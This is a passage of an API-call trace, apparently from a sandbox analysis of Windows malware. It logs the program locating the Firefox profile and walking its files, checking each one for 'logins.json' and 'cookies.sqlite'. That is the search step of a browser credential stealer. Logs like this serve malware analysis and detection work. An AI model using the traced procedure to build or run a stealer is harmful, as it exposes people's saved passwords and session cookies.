hHeap=0x8e0000) returned 1 [0160.180] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Main" [0160.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", ulOptions=0x0, samDesired=0x20219, phkResult=0x2df9e8 | out: phkResult=0x2df9e8*=0x150) returned 0x0 [0160.180] RegQueryValueExW (in: hKey=0x150, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2df9ec, lpData=0x0, lpcbData=0x2df9f8*=0x0 | out: lpType=0x2df9ec*=0x1, lpData=0x0, lpcbData=0x2df9f8*=0x66) returned 0x0 [0160.180] GetProcessHeap () returned 0x8e0000 [0160.180] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fcdb8 [0160.180] RegQueryValueExW (in: hKey=0x150, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x8fcdb8, lpcbData=0x2df9f8*=0x66 | out: lpType=0x0, lpData=0x8fcdb8*=0x43, lpcbData=0x2df9f8*=0x66) returned 0x0 [0160.180] RegCloseKey (hKey=0x150) returned 0x0 [0160.180] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0160.180] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0160.180] lstrlenW (lpString="") returned 0 [0160.180] GetProcessHeap () returned 0x8e0000 [0160.180] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x90a8a0 [0160.180] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" [0160.180] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpString2="" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" [0160.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0160.180] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0160.180] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0160.180] GetProcessHeap () returned 0x8e0000 [0160.180] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x912b88 [0160.180] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x912b88 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0160.183] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0160.183] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0160.183] GetProcessHeap () returned 0x8e0000 [0160.183] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x912d98 [0160.183] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0160.183] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.183] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df9c8, dwLength=0x1c | out: lpBuffer=0x2df9c8*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.183] GetProcessHeap () returned 0x8e0000 [0160.183] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0160.183] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0160.192] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0160.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.192] lstrlenW (lpString="") returned 0 [0160.192] GetProcessHeap () returned 0x8e0000 [0160.192] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x912b88 [0160.192] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.192] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.192] lstrlenW (lpString="profiles.ini") returned 12 [0160.192] GetProcessHeap () returned 0x8e0000 [0160.192] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x96) returned 0x912c10 [0160.192] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.192] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0160.192] GetProcessHeap () returned 0x8e0000 [0160.192] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfdea) returned 0x912e20 [0160.193] GetProcessHeap () returned 0x8e0000 [0160.193] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x922c18 [0160.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0160.193] CloseHandle (hObject=0x15c) returned 1 [0160.194] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x912e20, nSize=0xfde8, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0160.196] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0160.196] lstrlenW (lpString="General") returned 7 [0160.196] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0160.196] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x922c18, nSize=0xfff, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/silmbjec.default") returned 0x19 [0160.197] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0160.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.197] lstrlenW (lpString="Profiles/silmbjec.default") returned 25 [0160.197] GetProcessHeap () returned 0x8e0000 [0160.197] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x912cb0 [0160.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0160.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.198] lstrlenW (lpString="") returned 0 [0160.198] GetProcessHeap () returned 0x8e0000 [0160.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x923c20 [0160.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.198] lstrlenW (lpString="\\*.*") returned 4 [0160.198] GetProcessHeap () returned 0x8e0000 [0160.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x923cd8 [0160.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*" [0160.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*", lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0160.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.201] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.207] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.207] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.207] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb76a6d10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0160.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.207] lstrlenW (lpString="\\") returned 1 [0160.207] GetProcessHeap () returned 0x8e0000 [0160.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.207] lstrlenW (lpString="addons.json") returned 11 [0160.207] GetProcessHeap () returned 0x8e0000 [0160.207] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924e60 [0160.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" [0160.207] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.207] GetProcessHeap () returned 0x8e0000 [0160.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="logins.json") returned 0x0 [0160.207] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="cookies.sqlite") returned 0x0 [0160.207] VirtualQuery (in: lpAddress=0x924e60, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.207] GetProcessHeap () returned 0x8e0000 [0160.207] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e60 | out: hHeap=0x8e0000) returned 1 [0160.207] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0160.207] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0160.207] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0160.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.207] lstrlenW (lpString="\\") returned 1 [0160.208] GetProcessHeap () returned 0x8e0000 [0160.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924da0 [0160.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.208] lstrlenW (lpString="bookmarkbackups") returned 15 [0160.208] GetProcessHeap () returned 0x8e0000 [0160.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0160.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.208] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.208] GetProcessHeap () returned 0x8e0000 [0160.208] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.208] lstrlenW (lpString="") returned 0 [0160.208] GetProcessHeap () returned 0x8e0000 [0160.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcf68 [0160.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.208] lstrlenW (lpString="\\*.*") returned 4 [0160.208] GetProcessHeap () returned 0x8e0000 [0160.208] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x924da0 [0160.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*" [0160.208] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.211] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.211] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0160.211] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.211] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.211] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc37df2c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x54, dwReserved1=0x54, cFileName="bookmarks-2017-06-05_5.json", cAlternateFileName="BOOKMA~1.JSO")) returned 1 [0160.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.211] lstrlenW (lpString="\\") returned 1 [0160.211] GetProcessHeap () returned 0x8e0000 [0160.211] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925e88 [0160.211] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 